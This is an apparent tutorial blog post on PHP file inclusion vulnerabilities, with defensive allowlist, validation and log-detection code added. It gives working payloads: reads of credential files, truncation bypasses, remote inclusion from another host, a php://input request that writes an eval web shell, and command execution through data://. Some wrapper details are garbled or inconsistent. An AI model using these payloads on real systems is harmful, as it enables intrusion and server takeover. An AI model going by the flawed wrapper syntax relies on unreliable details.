Web Security Principles - File Inclusion Vulnerabilities

Foreword

After breakfast I started working through the challenge problems on the offense-and-defense site, and I could not even solve a simple file inclusion question, so I had to buy the book and learn it from scratch. This is my summary of file inclusion vulnerabilities!

I. File Inclusion Vulnerabilities

When the parameter passed to a file inclusion function is not filtered or strictly constrained and can be controlled by the user, the function may include a file that was never intended. If that file contains malicious code, the code inside it is parsed and executed regardless of the file's type or extension.

File inclusion vulnerabilities can lead to the server's pages being tampered with, the site being used to serve malware, the server being remotely controlled, backdoors being installed, and other harms.

Common file inclusion functions:

1. include() includes and evaluates the specified file. If an error occurs it emits a warning (E_WARNING) and the script generally continues to run.

2. include_once() includes and evaluates the specified file during script execution. The difference from include: it checks whether the file has already been included, and if so it is not included again.

3. require() includes and evaluates the specified file. The difference from include: when an error occurs, require produces a fatal E_COMPILE_ERROR and the script halts.

4. require_once() is essentially the same as require. The difference: it checks whether the file has already been included, and if so it is not included again.

Vulnerability sample code:

<?php
    $filename = $_GET['filename'];   // taken straight from the request, unfiltered
    include($filename);              // attacker-controlled path reaches include()
?>

In the code above, the $_GET['filename'] parameter is not strictly filtered and is passed straight into include(). An attacker can change the value of $_GET['filename'] to load other files and perform unintended operations, which is what creates the file inclusion vulnerability.

If we place a file 1.txt in the current directory and then include it through this parameter, the contents of 1.txt are displayed.
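The usual fix for the code above, shown here as an added example that is not part of the original post: the request parameter is never passed to include() at all, but is used only as a key into a fixed allowlist of pages. The page names and file paths in the map are assumptions.

```php
<?php
// Added example (not from the original post): replacing the unfiltered
// include() with an allowlist lookup. Only the values in PAGES can ever be
// included, so the request parameter is never used as a path.
// The page names and file paths below are assumptions.
declare(strict_types=1);

const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/**
 * Resolve a user-supplied page name to an absolute path, or null if it is
 * not in the allowlist. The user value is only ever used as an array key.
 */
function resolve_page(string $name, array $allow, string $base): ?string
{
    if (!array_key_exists($name, $allow)) {
        return null;                  // unknown name: refuse, do not guess
    }
    return $base . DIRECTORY_SEPARATOR . $allow[$name];
}

$raw  = $_GET['page'] ?? 'home';
$name = is_string($raw) ? $raw : '';  // page[]=x arrives as an array: never a valid key
$path = resolve_page($name, PAGES, __DIR__);

if ($path === null) {
    http_response_code(404);          // fail closed; do not echo the input back
    exit('unknown page');
}
include $path;                        // built from constants, never from raw input
```

Because the lookup is an exact key match, none of the truncation, traversal or wrapper tricks discussed later in this post have anything to act on: a value that is not literally one of the keys is rejected before any filesystem call.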

II. Unrestricted Local File Inclusion Vulnerabilities

An unrestricted local file inclusion vulnerability is one where the code neither fixes a specific prefix for the included file nor appends a .php or .html extension, so an attacker can exploit it to read other files on the operating system, obtain sensitive information, or execute code held in other files.

Common sensitive file paths

Windows

c:\boot.ini // check the system version

c:\XX\httpd.conf // Apache configuration

c:\windows\system32\inetsrv\MetaBase.xml // IIS configuration file

c:\windows\repair\sam // stores the password from the first installation of Windows

c:\ProgramFiles\mysql\my.ini // MySQL configuration

c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root password

c:\windows\php.ini // PHP configuration

Linux/Unix

/etc/passwd // account information

/etc/shadow // account password file

/etc/httpd/conf/httpd.conf // Apache configuration file

/etc/my.conf // MySQL configuration file

/usr/local/app/apache2/conf/httpd.conf // Apache2 default configuration file

/usr/local/app/apache2/conf/extra/httpd-vhost.conf // virtual host configuration

/usr/local/app/php5/lib/php.ini // PHP configuration

Unrestricted local file inclusion example:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Exploitation: reading the MySQL configuration

Payload:

http://127.0.0.1/test.php?filename=C:\phpStudy\PHPTutorial\MySQL\my.ini

Using the unrestricted local inclusion vulnerability to execute code

III. Restricted Local File Inclusion Vulnerabilities

Overview:

A restricted local file inclusion vulnerability is one where the code fixes a specific prefix for the included file or appends a .php or .html extension. The attacker must bypass the prefix or extension filter before the vulnerability can be used to read other files on the operating system and obtain sensitive information. The three main ways of bypassing the filter in restricted local file inclusion are: %00 truncation, path length truncation, and dot truncation.

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename.".html");   // extension is appended, so only the suffix is "fixed"
?>

1. %00 truncation

%00 is treated as a string terminator, so the data after it is ignored and the appended extension is truncated. An attacker can use this to bypass the extension filter.

Exploitation conditions:

(1) magic_quotes_gpc=off

(2) PHP<5.3.4

Test result:

Payload: http://127.0.0.1/test.php?filename=xiaohua.txt%00

The %00 truncates the trailing .html extension filter, and the contents of xiaohua.txt are read successfully.

2. Path length truncation

The operating system limits the maximum path length. A path longer than that limit can be supplied; the system then discards the remainder of the path, truncating the appended extension.

Exploitation conditions:

On Windows the maximum path length of a directory is 256 bytes.

On Linux the maximum path length of a directory is 4096 bytes.

Test payload:

http://127.0.0.1/test.php?filename=xiaohua.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

After execution the trailing .html extension is truncated and xiaohua.txt is included.

3. Dot truncation

Dot truncation applies to Windows: when the run of dots is longer than 256 bytes, the extension is truncated.

Test payload:

http://127.0.0.1/test.php?filename=xiaohua.txt....................................................................................................................................................................................................................................................................

The dots truncate the trailing .html extension and the desired file is included.
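All three truncation tricks in this section, and the sensitive-file reads of section II, work because the code trusts the appended ".html" to constrain the path. As an added example (not from the original post), here is a validation routine that rejects those inputs before include() is ever reached: a NUL check, a strict character allowlist with a length cap, and a realpath() containment check. The templates directory and the sample inputs are constructed for illustration.

```php
<?php
// Added example (not from the original post): a fixed-extension include that
// does not rely on the appended ".html" for safety. Each check defeats one
// of the bypasses described in sections II and III. The "templates"
// directory and the sample inputs are constructed for the demo.
declare(strict_types=1);

/**
 * Return the absolute path of "<base>/<name>.html" if $name is a plain
 * file name and the resolved file lies inside $base; otherwise return null.
 */
function safe_template_path(string $base, string $name): ?string
{
    // %00 truncation: PHP >= 5.3.4 already refuses NUL bytes in include(),
    // but reject explicitly so the request fails before any filesystem call.
    if (strpos($name, "\0") !== false) {
        return null;
    }
    // Path-length and dot truncation both need long runs of "/." or ".";
    // a strict character allowlist with a length cap removes both, and also
    // removes "../" traversal and every "scheme://" wrapper prefix.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        return null;
    }
    $baseReal = realpath($base);
    $fileReal = realpath($base . DIRECTORY_SEPARATOR . $name . '.html');
    if ($baseReal === false || $fileReal === false) {
        return null;                                  // no such file
    }
    // Containment: the resolved file must sit under the resolved base, which
    // also catches symlinks that point outside the template directory.
    if (strpos($fileReal, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $fileReal;
}

// Constructed template directory with one legitimate file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'index.html', "<p>hello</p>\n");

// Constructed inputs: the first is legitimate, the rest are the bypass
// shapes from sections II and III. Only the first resolves to a path.
$samples = [
    'index',
    "xiaohua.txt\0",
    'xiaohua.txt' . str_repeat('/.', 2000),
    'xiaohua.txt' . str_repeat('.', 300),
    '../../../etc/passwd',
    'php://filter/read=convert.base64-encode/resource=index',
];
foreach ($samples as $s) {
    $p = safe_template_path($base, $s);
    printf("%-40s => %s\n", substr(addcslashes($s, "\0"), 0, 40), $p ?? 'rejected');
}

unlink($base . DIRECTORY_SEPARATOR . 'index.html');
rmdir($base);

// In a request handler the same function guards the include:
//   $p = safe_template_path(__DIR__ . '/templates', (string)($_GET['filename'] ?? ''));
//   if ($p === null) { http_response_code(404); exit; }
//   include $p;
```

The character allowlist is the check doing most of the work: once dots, slashes and colons are excluded, there is no way to express a truncation padding, a parent-directory reference or a wrapper scheme, and realpath() containment remains as a second, independent line of defence for anything the regex is later relaxed to permit.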

IV. Session File Inclusion

Definition:

When the path of the session file can be obtained and the content of the session file is controllable, including the session file lets an attacker include content they control.

Exploitation conditions:

1. The session storage location can be obtained

2. The session content is controllable

(1) Obtaining the session storage location from phpinfo

The session.save_path entry in phpinfo holds the session storage location. From the phpinfo output the value of session.save_path is obtained; here it is /var/lib/php.

<?php
    session_start();
    $ctfs = $_GET['ctfs'];            // user input, stored unfiltered
    $_SESSION['username'] = $ctfs;     // written verbatim into the sess_* file
?>

In this code the value of $ctfs is passed in through the GET parameter ctfs, and the PHP code stores it in the session. An attacker can use the ctfs parameter to write malicious code into the session file, then use a file inclusion vulnerability to include that session file and so pass malicious code into the system.

Exploitation payload:

http://127.0.0.1/test.php?ctfs=<?php phpinfo(); ?>  (writes a PHP statement into the session)

http://127.0.0.1/test.php?filename=C:\phpStudy\PHPTutorial\tmp\tmp\sess_c3b4faa1f3b28c602c862bdf366fd92c  (includes the session file)

Session file name (the real file name always carries the default prefix sess_).

V. Remote File Inclusion

1. Unrestricted remote file inclusion

Unrestricted remote file inclusion means the included file is not on the local server but is fetched from another server by URL, and the malicious code in that file is executed.

Exploitation conditions:

(1) allow_url_fopen=on

(2) allow_url_include=on

Vulnerable code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Payload:

http://127.0.0.1/test.php?filename=http://192.168.1.110/xiaohua.txt

The PHP code contained in xiaohua.txt is parsed and executed as PHP through the remote file inclusion.

2. Restricted remote file inclusion

Restricted remote file inclusion means the code applies a specific prefix or an extension filter such as .php or .html; the attacker only needs to bypass the prefix or extension filter to execute the malicious code at the remote URL.

Vulnerable code:

<?php
    $filename = $_GET['filename'];
    include($filename.".html");
?>

1. Question-mark bypass

http://127.0.0.1/test.php?filename=http://192.168.1.110/xiaohua.txt?

2. # bypass

http://127.0.0.1/test.php?filename=http://192.168.1.110/xiaohua.txt%23 (the # must be URL-encoded)

3. Space bypass

http://127.0.0.1/test.php?filename=http://192.168.1.110/xiaohua.txt%20 (%20 is the URL encoding of a space)

Fuzzing can test these variants at scale.

VI. PHP Stream Wrappers (Pseudo-Protocols)

PHP ships with many built-in URL-style wrappers that can be used with filesystem functions such as fopen(), copy(), file_exists() and filesize(). Besides these built-in wrappers, custom wrappers can be registered with stream_wrapper_register(). These protocols are collectively called pseudo-protocols.

file:// - access the local filesystem

http:// - access HTTP(s) URLs

ftp:// - access FTP(s) URLs

php:// - access the various input/output streams (I/O streams)

zlib:// - compression streams

data:// - read data (RFC 2397)

glob:// - find pathnames matching a pattern

phar:// - PHP archives

ssh2:// - Secure Shell 2

rar:// - RAR

ogg:// - audio streams

expect:// - process interactive streams

The php:// wrapper

The php:// wrapper exposes a set of PHP input/output stream features: PHP's input and output streams, the standard input, output and error descriptors, temporary streams backed by memory or disk, and filters that can operate on other readable and writable file resources.

1. php://filter

php://filter is a meta-wrapper designed to apply filters when a stream is opened; it can read and write local disk files.

Exploitation conditions:

Reading local disk files with php://filter does not require allow_url_fopen or allow_url_include to be enabled.

Usage:

(1): filename=php://filter/read=convert.base64-encode/resource=xx.php
(2): filename=php://filter/convert.base64-encode/resource=xxx.php

Parameters:

resource=<the data stream to filter>    required

read=<filter list for the read chain>    optional

write=<filter list for the write chain>  optional

Vulnerable code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Payload:

http://127.0.0.1/test.php?filename=php://filter/read=convert.base64-encode/resource=test.php

php://filter returns the Base64 encoding of the test.php source instead of executing it.

2. php://input

php://input is a read-only stream that gives access to the raw request body, so the unparsed POST data can be read directly; php://input is not available when enctype="multipart/form-data" is used.

(1) Reading POST data

Exploitation conditions:

Example code:

<?php
    echo file_get_contents("php://input");   // echoes the raw request body
?>

The code above outputs the php://input data obtained by file_get_contents(). Testing with POST data consisting of the string xiaohua, the output is that same string: php://input can obtain the data passed in via POST.

(2) Writing a web shell

Exploitation environment:

allow_url_include=on must be enabled

Vulnerable code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Payload:

URL: http://192.168.1.110/test.php?filename=php://input
POST: <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[xiaohua])>')?>

Executing through php://input successfully creates shell.php in the web root.

(3) Executing commands

The vulnerable code is essentially the same as for writing the web shell; only the POST body needs to change.

POST: <?php system('whoami');?>

URL: http://192.168.1.110/test.php?filename=php://input

3. The file:// wrapper

The file:// wrapper accesses the local filesystem and reads file contents.

Example code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Payload:

http://192.168.1.110/test.php?filename=file://C:\phpStudy\PHPTutorial\WWW\xiaohua.txt

4. The data:// wrapper

Since PHP 5.2.0 the data stream wrapper has been available, mainly for reading data streams. If the data passed in is PHP code, the code is executed.

Exploitation environment:

allow_url_include=on

allow_url_fopen=on

Usage:

data://text/plain;base64,xxxx (base64-encoded data)

Example code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Base64-encode <?php system("dir")?>:

PD9waHAgc3lzdGVtKCJkaXIiKT8+ (the trailing + must be URL-encoded as %2b)

Final payload:

http://192.168.1.110/test.php?filename=data://text/plain;base64,PD9waHAgc3lzdGVtKCJkaXIiKT8%2b

5. The phar:// wrapper

phar:// is a wrapper used to unpack archives; whatever the extension of the file named in the phar:// parameter, it is treated as an archive.

Exploitation environment:

PHP>5.3.0

allow_url_include=on

allow_url_fopen=on

Example code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Usage:

?file=phar://<archive>/<file inside the archive>, e.g. phar://xxx.png/shell.php

The archive must be a zip archive (the zip:// wrapper), not a rar:// archive.

Payload: 192.168.1.110/test.php?filename=phar://shell.png/shell.php

6. The zip:// wrapper

The zip:// wrapper works on the same principle as phar://, but its syntax differs.

Exploitation environment:

PHP>5.3.0

allow_url_include=on

allow_url_fopen=on

Example code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Usage:

?file=zip://[absolute path of the archive]#[name of the file inside the archive]

Eg: zip://xxx.png#shell.php

Payload: 192.168.1.110/test.php?filename=zip//shell.png:shell.php

7. The expect:// wrapper

The expect:// wrapper is mainly used to execute system commands, but the expect extension must be installed.

Usage:

?file=expect://ls
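As an added example that is not part of the original post, the following script covers the remote-inclusion and wrapper payload shapes of sections V and VI from the defender's side: classify_request() flags web-server log lines whose request target carries directory traversal, a NUL byte, truncation padding, a remote URL or a stream wrapper scheme, and audit_ini() reports the php.ini switches the post lists as exploitation prerequisites. The log lines are constructed (combined log format, fake client addresses) and the signature list is a heuristic starting point, not a complete rule set.

```php
<?php
// Added example (not from the original post): a signature-based detector for
// the inclusion payload shapes described in sections II-VI, run over
// constructed access-log lines, plus an audit of the php.ini switches the post
// names as exploitation prerequisites. Log lines and addresses are made up.
declare(strict_types=1);

/** Signatures: name => regex applied to the URL-decoded request target. */
const LFI_SIGNATURES = [
    'null-byte truncation' => '/\x00/',
    'directory traversal'  => '#(^|[\\\\/])\.\.([\\\\/]|$)#',
    'truncation padding'   => '#(/\.){50,}|\.{50,}#',
    'sensitive file'       => '#/etc/(passwd|shadow)|boot\.ini|repair[\\\\/]sam\b|my\.ini|php\.ini#i',
    'remote url inclusion' => '#=(https?|ftps?)://#i',
    'stream wrapper'       => '#=(php|data|phar|zip|expect|file|glob)://#i',
];

/**
 * Classify one combined-format log line. Returns the matched signature names
 * (empty when the line looks benign). The request target is taken from the
 * quoted "METHOD target PROTOCOL" field.
 */
function classify_request(string $line): array
{
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return [];
    }
    // Decode twice: the post encodes "#" as %23 and "+" as %2b, and scanners
    // commonly double-encode to slip past a single-pass filter.
    $target = rawurldecode(rawurldecode($m[1]));
    $hits = [];
    foreach (LFI_SIGNATURES as $name => $re) {
        if (preg_match($re, $target)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Report php.ini settings that the post lists as exploitation prerequisites. */
function audit_ini(): array
{
    $findings = [];
    foreach (['allow_url_include', 'allow_url_fopen'] as $key) {
        if (filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = "$key is enabled";
        }
    }
    $basedir = ini_get('open_basedir');
    if ($basedir === false || $basedir === '') {
        $findings[] = 'open_basedir is not set';   // no filesystem fence for include()
    }
    return $findings;
}

// Constructed sample lines (combined log format, fake client addresses).
$log = <<<'LOG'
10.0.0.5 - - [10/Jan/2020:09:00:01 +0800] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.6 - - [10/Jan/2020:09:00:02 +0800] "GET /test.php?filename=../../../../etc/passwd HTTP/1.1" 200 1200
10.0.0.7 - - [10/Jan/2020:09:00:03 +0800] "GET /test.php?filename=xiaohua.txt%00 HTTP/1.1" 200 80
10.0.0.8 - - [10/Jan/2020:09:00:04 +0800] "GET /test.php?filename=php://filter/read=convert.base64-encode/resource=test.php HTTP/1.1" 200 900
10.0.0.9 - - [10/Jan/2020:09:00:05 +0800] "GET /test.php?filename=http://192.168.1.110/xiaohua.txt%23 HTTP/1.1" 200 300
10.0.0.10 - - [10/Jan/2020:09:00:06 +0800] "GET /test.php?filename=data://text/plain;base64,PD9waHAgc3lzdGVtKCJkaXIiKT8%2b HTTP/1.1" 200 300
LOG;

foreach (explode("\n", $log) as $line) {
    $hits = classify_request($line);
    if ($hits !== []) {
        echo 'ALERT [' . implode(', ', $hits) . '] ' . $line . "\n";
    }
}
foreach (audit_ini() as $finding) {
    echo 'CONFIG ' . $finding . "\n";
}
```

Run from the command line, the first line is silent and each of the other five produces an ALERT naming the signature it tripped; the CONFIG lines reflect whatever php.ini the interpreter loaded. A 200 status on such a request, as in the constructed lines, is the detail worth alerting on: the same payload answered with 404 or 500 is a probe, while 200 with a plausible body size suggests the include actually succeeded.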

Fixing file inclusion vulnerabilities

Reference reading: 《web安全原理分析与实践》 (Web Security: Principle Analysis and Practice)


Origin www.cnblogs.com/xhds/p/12216170.html